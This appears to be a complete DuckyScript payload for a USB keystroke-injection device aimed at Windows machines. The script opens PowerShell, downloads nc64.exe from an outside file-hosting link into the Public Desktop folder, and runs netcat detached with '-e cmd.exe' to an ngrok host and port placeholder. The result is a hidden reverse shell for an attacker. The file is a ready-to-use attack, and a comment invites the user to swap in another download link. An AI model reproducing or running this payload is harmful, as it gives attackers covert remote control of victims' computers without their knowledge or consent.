DELAY 1000
GUI r
DELAY 500 	

STRING cmd
ENTER
DELAY 1000

STRING powershell
DELAY 500 	
ENTER

STRING cd C:\Users\Public\Desktop
ENTER
DELAY 300

STRING $URL="https://up10.me/H/nc64.exe"
REM  if u want u can update this download link with another secure link
ENTER
STRING $Path="C:\Users\Public\Desktop\nc64.exe"
ENTER
DELAY 3000

STRING Invoke-Webrequest -URI $URL -OutFile $Path
ENTER
DELAY 1000
STRING .\nc64.exe NGROK_LINK(without tcp://) NGROK_PORT -e cmd.exe -d
ENTER
